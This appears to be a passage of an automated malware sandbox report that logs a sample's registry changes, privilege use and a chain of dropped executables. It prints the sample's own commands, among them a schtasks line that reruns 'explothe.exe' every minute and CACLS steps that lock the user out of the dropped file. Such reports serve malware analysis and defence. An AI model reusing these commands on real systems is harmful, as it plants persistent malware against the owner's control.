| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4AF3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe
"C:\Users\Admin\AppData\Local\Temp\5714d0cd0fa6ab01767b9f5b56f6ebe8ce60149dd09205fc14b688b7d4b6a4b0.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1844 -ip 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 196
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6DA5dP6.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6DA5dP6.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1DA5.tmp\1DB5.tmp\1DB6.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x148,0x174,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff912cc46f8,0x7ff912cc4708,0x7ff912cc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16123523405751983624,8471195437817248918,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2492 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11715136987403279359,8478760683434930365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16123523405751983624,8471195437817248918,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11715136987403279359,8478760683434930365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\45FE.exe
C:\Users\Admin\AppData\Local\Temp\45FE.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\47E3.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe
C:\Users\Admin\AppData\Local\Temp\493C.exe
C:\Users\Admin\AppData\Local\Temp\493C.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12119760436017153929,12975412688562994442,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
